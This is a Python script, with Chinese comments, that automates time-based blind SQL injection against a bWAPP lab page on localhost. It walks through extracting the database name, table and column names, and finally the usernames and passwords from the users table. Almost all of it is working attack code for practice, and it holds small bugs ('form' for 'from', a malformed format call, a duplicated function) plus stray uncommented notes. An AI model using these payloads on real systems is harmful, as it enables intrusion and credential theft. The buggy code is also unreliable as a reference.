import requests
import time
import yaml

HEADER={
    "cookie":"PHPSESSID=mgmbi0f5munhthiqfrvbmg73v1; security_level=0"
}
BASE_URL='http://localhost/bWAPP/app/sqli_15.php'
config_path = "E:/Django/hhPro/yamls/sqlBlindInjection.yaml"
# 读取test.yaml文件
with open(config_path, "r") as file:
    data = yaml.load(file.read())
    student1 = data["BLINDSQL"]["SQL1"]
    #print(student1)

def get_database_name_length(a,b)->int:
    count=0
    #title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search
    if a[-1]!="?":
        a=a+"?"
    for i in range(1,100):
        url=a+b.format(i)
        start_time = time.time()
        print(url)
        requests.get(url,headers=HEADER)
        if time.time() - start_time > 2:
            print("盲注数据库名长度为{}".format(i))
            count = i
            return count
    return count

#获得盲注的数据库长度
def get_database_name()->int:
    count=0
    #title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search
    for i in range(1,100):
        url=BASE_URL+"?title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(2) -- &action=search".format(i)
        start_time = time.time()
        requests.get(url,headers=HEADER)
        if time.time() - start_time > 2:
            print("盲注数据库名长度为{}".format(i))
            count = i
            return count
    return count
#获得盲注的数据库名称
def get_database_table(count):
    #mmp=get_database_name()
    x=""
    for i in range(1,count+1):
        for m in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND ord(mid(DATABASE(),{},1))={} and SLEEP(2) -- &action=search".format(i,m)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                x=x+chr(m)
                print("盲注数据库名长度为{}".chr(m))
                break
    print("打印数据库名称"+x)

#获得数据库此库下面表数量
def get_table_count()->int:
    for i in range(1,100):
        url=BASE_URL+"?title=Iron Man' and "+student1+"={}".format(i)+" -- &action=search"
        start_time=time.time()
        requests.get(url,headers=HEADER)
        if time.time()-start_time>2:
            count =i
            print("打印当前数据库下面表数量{}"+str(count))
            break
    return count

#获得每个数据库表名的长度
def get_table_counts(counts)->int:
    for i in range(counts + 1):
        for m in range(1,100):
            url=BASE_URL+"?title=Iron Man' and (select length(table_name) from information_schema.tables where table_schema=database() limit {},1)={}" \
                        " and sleep(2) -- &action=search".format(i,m)
            start_time=time.time()
            requests.get(url,headers=HEADER)
            if time.time()-start_time>2:
                print("打印当前表名长度{}".format(m))
                get_database_tabless(i, m)
                break
    return m

#获得所有数据库的表名
def get_database_tabless(index,count):
    x=""
    for i in range(1,count+1):
        for m in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND " \
                         "ascii(substr((select table_name from information_schema.tables " \
                         "where table_schema=database() limit {},1),{},1))={}" \
                         " and sleep(2) -- &action=search".format(index,i,m)
            #上面的意思是select括号里面，获得表的长度(第一个表)，substr('str',1,1)然后来判断第一个表的字符是什么
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                x=x+chr(m)
                break
    print("打印数据库名称{}" + x)
    x=""
    return x

#根据打印结果，想需要users表里面的列总数
def get_table_count()->int:
    count=0
    #select count(column_name) from information_schema.columns where table_name='users'  统计users表中有多少个字段
    for i in range(1,100):
        url=BASE_URL+"?title=Iron Man' AND (select count(column_name) from information_schema.columns where table_name='users')={} " \
                     "AND SLEEP(2) -- &action=search".format(i)
        start_time = time.time()
        requests.get(url,headers=HEADER)
        if time.time() - start_time > 2:

            print("盲注数据库中users表列数量为：{}".format(i))
            count = i
            return count
    return count

#获得users表中列名的长度
def get_table_nameNumber(count):
    for i in range(count+1):
        for j in range(100):
            url=BASE_URL+"?title=Iron Man' AND (select length(column_name) from information_schema.columns where table_name='users' limit {},1)={} " \
                     "AND SLEEP(2) -- &action=search".format(i,j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                get_column_name_of(i,j)
                print("user表，字段长度为{}".format(j))
                break

#获取每个字段的名称
def get_column_name_of(index,count):
    for i in range(count+1):
        for j in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND " \
                         "ascii(substr(select column_name form information_schema.columns where table_name='user'),{},1)={} " \
                         "AND SLEEP(2) -- &action=search".format(index,i,j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                print(chr(j))
                break

#获得所需字段的用户名跟密码
def get_username_password():
    values=""
    for i in range(100):
        for j in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND ascii(substr((select concat(login,',',password) from users limit 0,1),{},1))={} " \
                         "AND SLEEP(2) -- &action=search".format(i,j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                values=values+chr(j)
                break
    print(values)
    values=""

备注：盲注的时候一般使用and

if __name__=='__main__':
    #get_table_counts(get_table_count())
    #get_database_table(get_database_name())
    #get_table_counts(get_table_count())
    #get_table_count()
    #get_table_count()#打印users表中总列数量
    get_username_password()#打印需要的日志

userAgent:浏览器访问要求，可以绕过最简单的内容，单引号判断sql注入